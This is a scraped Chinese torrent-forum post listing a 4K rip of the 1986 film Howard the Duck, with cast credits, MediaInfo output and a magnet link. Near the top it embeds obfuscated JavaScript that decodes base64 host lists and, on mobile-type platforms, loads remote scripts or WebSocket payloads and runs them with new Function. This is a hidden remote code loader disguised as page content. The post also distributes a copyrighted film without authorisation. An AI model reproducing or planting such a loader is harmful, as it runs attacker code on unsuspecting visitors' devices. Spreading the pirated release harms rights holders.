天降神兵[中文字幕]Howard.the.Duck.1986.2160p.HDR.UHD.BluRay.DTS-X.7.1.x265-10bit-迅雷下载 15.52GB

版主小s 2月前 391

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 天降神兵 / 霍华德怪鸭 / 霍华德鸭子 / 天将神兵
◎片  名 Howard the Duck
◎年  代 1986
◎产  地 美国
◎类  别 喜剧 / 动作 / 爱情 / 科幻 / 冒险
◎语  言 英语
◎上映日期 1986-08-01(美国)
◎IMDb链接 https://www.imdb.com/title/tt0091225/
◎豆瓣评分 6.1/10 (433人评价)
◎豆瓣链接 https://movie.douban.com/subject/1295641/
◎片  长 110 分钟
◎导  演 威拉德·赫依克 Willard Huyck (id:1050370)
◎编  剧 史蒂夫·格伯 Steve Gerber (id:1051248)
       威拉德·赫依克 Willard Huyck (id:1050370)
       格洛丽亚·卡茨 Gloria Katz (id:1288204)
◎演  员 莉·汤普森 Lea Thompson (id:1019014)
       杰弗瑞·琼斯 Jeffrey Jones (id:1027832)
       蒂姆·罗宾斯 Tim Robbins (id:1054521)
       艾迪·盖尔 Ed Gale (id:1093015)
       奇普·兹恩 Chip Zien (id:1165342)
       蒂姆·罗斯 Tim Rose (id:1140454)
       乔丹·普林蒂斯 Jordan Prentice (id:1127606)
       保罗·吉尔福伊尔 Paul Guilfoyle (id:1054721)
       Liz Sagal Liz Sagal (id:1027542)
       Dominique Davalos Dominique Davalos (id:1087245)
       霍利·罗宾森·皮特 Holly Robinson Peete (id:1054934)
       汤米·斯威德洛 Tommy Swerdlow (id:1404242)
       理查德·埃德森 Richard Edson (id:1343880)
       Miles Chapin Miles Chapin (id:1077843)
       理查德·麦克格纳格尔 Richard McGonagle (id:1115113)
       弗吉尼亚·卡珀斯 Virginia Capers (id:1071435)
       黛比·李·卡林顿 Debbie Lee Carrington (id:1076595)
       米盖尔·桑多瓦尔 Miguel Sandoval (id:1142087)
       保罗.康尼 Paul Comi (id:1072378)
       大卫·佩默 David Paymer (id:1049845)
       Thomas Dolby Thomas Dolby (id:1028356)
       克里斯托弗·洛根 Kristopher Logan (id:1117281)
       约翰·弗利克 John Fleck (id:1081954)
       Steven Kravitz Steven Kravitz (id:1103987)
       南茜·费什 Nancy Fish (id:1032339)
       理查德·基利 Richard Kiley (id:1114560)
       梅尔·布兰科 Mel Blanc (id:1055154)
       C. Andrew Nelson C. Andrew Nelson (id:1054617)
       詹姆斯·奥里亚 James Olea (id:1170239)
       格洛丽亚·卡茨 Gloria Katz (id:1288204)
       伊安·布莱斯 Ian Bryce (id:1279526)
       乔治·卢卡斯 George Lucas (id:1054507)
       西德尼·沃尔因斯基 Sidney Wolinsky (id:1301170)
       迈克尔·钱德勒 Michael Chandler (id:1280454)
       迪安娜·克里滕登 Dianne Crittenden (id:1281490)
       菲尔·艾布拉姆森 Phil Abramson (id:1276763)
       乔·汤普金斯 Joe I. Tompkins (id:1299373)
       巴里·德雷班德-布尔曼 Bari Dreiband-Burman (id:1282711)
       托马斯·R·伯曼 Thomas R. Burman (id:1279663)
       乔伊·萨帕塔 Joy Zapata (id:1301634)
       Dan Kolsrud Dan Kolsrud (id:1288852)
       约翰·埃利斯 John Ellis (id:1305506)
       迈克尔·J·麦卡利斯特尔 Michael J. McAlister (id:1291408)
       Mark S. Miller Mark S. Miller (id:1292098)
       杰克·莫多万 Jack Mongovan (id:1292344)
       Charlie Mullen Charlie Mullen (id:1292681)
       布鲁斯·尼科尔森 Bruce Nicholson (id:1293146)
       迈克尔·欧文斯 Michael Owens (id:1293758)
       托马斯·罗塞特 Thomas Rosseter (id:1296146)
       肯尼斯·史密斯 Kenneth Smith (id:1297900)
       David Sosalla David Sosalla (id:1298080)
       Tom St. Amand Tom St. Amand (id:1298210)
       Pat Sweeney Pat Sweeney (id:1298721)
       菲尔 蒂贝特 Phil Tippett (id:1299349)
       皮特·科扎齐克 Pete Kozachik (id:1288949)
       比尔·乔治 Bill George (id:1284713)
       戈登·贝克尔 Gordon Baker (id:1277729)
       约翰·阿姆斯特朗 John Allan Armstrong (id:1277410)
       汤姆·柏提诺 Tom Bertino (id:1278530)
       芭芭拉·布伦南 Barbara Brennan (id:1279246)
       乔恩·亚历山大 Jon Alexander (id:1276987)
       Charles Bailey Charles Bailey (id:1277693)
       兰迪·杜特拉 Randy Dutra (id:1282874)
       爱德华·赫希 Edward Hirsh (id:1286690)
       Ned Gorman Ned Gorman (id:1285204)
       埃德·琼斯 Ed Jones (id:1287861)

◎标  签 科幻 / 美国 / 喜剧 / 1986 / Marvel / 漫威 / 美国电影 / 漫画改编

◎简  介
  地球研究所向太空发离子光束,不料却把其它星球的动物及妖魔吸到地球来,最后还是透过星际鸭人把妖魔给打败。

  1. General
  2. Unique ID                                : 2432759547371872824883130105582094922 (0x1D4884E612D4AC7C748BD6FCF8C8A4A)
  3. Complete name                            : Howar[email protected]BBQDDQ.COM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 15.5 GiB
  7. Duration                                 : 1 h 50 min
  8. Overall bit rate mode                    : Variable
  9. Overall bit rate                         : 20.1 Mb/s
  10. Movie name                               : Howard the Duck 1986 2160p HDR UHD BluRay DTS-X 7.1 [email protected]
  11. Encoded date                             : UTC 2021-07-21 13:01:56
  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. HDR format                               : SMPTE ST 2086, HDR10 compatible
  20. Codec ID                                 : V_MPEGH/ISO/HEVC
  21. Duration                                 : 1 h 50 min
  22. Bit rate                                 : 13.8 Mb/s
  23. Width                                    : 3 840 pixels
  24. Height                                   : 2 072 pixels
  25. Display aspect ratio                     : 1.85:1
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 23.976 (24000/1001/53354) FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 10 bits
  31. Bits/(Pixel*Frame)                       : 0.072
  32. Stream size                              : 10.6 GiB (69%)
  33. Title                                    : @HDSky
  34. Writing library                          : x265 - H.265/HEVC codec
  35. Default                                  : Yes
  36. Forced                                   : No
  37. Color range                              : Limited
  38. Color primaries                          : BT.2020
  39. Transfer characteristics                 : PQ
  40. Matrix coefficients                      : BT.2020 non-constant
  41. Mastering display color primaries        : Display P3
  42. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2
  43. Maximum Content Light Level              : 739 cd/m2
  44. Maximum Frame-Average Light Level        : 331 cd/m2
  45. Audio
  46. ID                                       : 2
  47. Format                                   : DTS XLL X
  48. Format/Info                              : Digital Theater Systems
  49. Commercial name                          : DTS-HD Master Audio
  50. Codec ID                                 : A_DTS
  51. Duration                                 : 1 h 50 min
  52. Bit rate mode                            : Variable
  53. Bit rate                                 : 6 266 kb/s
  54. Channel(s)                               : 8 channels
  55. Channel(s)_Original                      : Object Based
  56. ChannelLayout_Original                   : Object Based
  57. Sampling rate                            : 48.0 kHz
  58. Frame rate                               : 93.750 FPS (512 SPF)
  59. Bit depth                                : 24 bits
  60. Stream size                              : 4.83 GiB (31%)
  61. Title                                    : English
  62. Language                                 : English
  63. Default                                  : Yes
  64. Forced                                   : No
  65. Text #1
  66. ID                                       : 3
  67. Format                                   : PGS
  68. Muxing mode                              : zlib
  69. Codec ID                                 : S_HDMV/PGS
  70. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  71. Duration                                 : 1 h 44 min
  72. Bit rate                                 : 48.5 kb/s
  73. Count of elements                        : 4135
  74. Stream size                              : 36.2 MiB (0%)
  75. Title                                    : ENG
  76. Language                                 : English
  77. Default                                  : Yes
  78. Forced                                   : No
  79. Text #2
  80. ID                                       : 4
  81. Format                                   : PGS
  82. Muxing mode                              : zlib
  83. Codec ID                                 : S_HDMV/PGS
  84. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  85. Duration                                 : 1 h 44 min
  86. Bit rate                                 : 41.3 kb/s
  87. Count of elements                        : 3135
  88. Stream size                              : 30.9 MiB (0%)
  89. Title                                    : CHS
  90. Language                                 : Chinese
  91. Default                                  : No
  92. Forced                                   : No
  93. Text #3
  94. ID                                       : 5
  95. Format                                   : PGS
  96. Muxing mode                              : zlib
  97. Codec ID                                 : S_HDMV/PGS
  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  99. Duration                                 : 1 h 44 min
  100. Bit rate                                 : 42.2 kb/s
  101. Count of elements                        : 3135
  102. Stream size                              : 31.6 MiB (0%)
  103. Title                                    : CHT
  104. Language                                 : Chinese
  105. Default                                  : No
  106. Forced                                   : No
  107. Menu
  108. 00:00:00.000                             : en:Chapter 01
  109. 00:06:19.670                             : en:Chapter 02
  110. 00:13:57.126                             : en:Chapter 03
  111. 00:20:13.295                             : en:Chapter 04
  112. 00:27:32.025                             : en:Chapter 05
  113. 00:32:09.134                             : en:Chapter 06
  114. 00:37:34.835                             : en:Chapter 07
  115. 00:44:27.831                             : en:Chapter 08
  116. 00:48:24.568                             : en:Chapter 09
  117. 00:55:36.206                             : en:Chapter 10
  118. 01:04:02.420                             : en:Chapter 11
  119. 01:13:03.837                             : en:Chapter 12
  120. 01:19:34.435                             : en:Chapter 13
  121. 01:26:40.612                             : en:Chapter 14
  122. 01:32:55.653                             : en:Chapter 15
  123. 01:37:23.462                             : en:Chapter 16
  124. 01:42:40.988                             : en:Chapter 17
  125. 01:46:07.985                             : en:Chapter 18


TAGS 动作 冒险 科幻 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:53B59A766870C5249838BBF46750764846331973
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回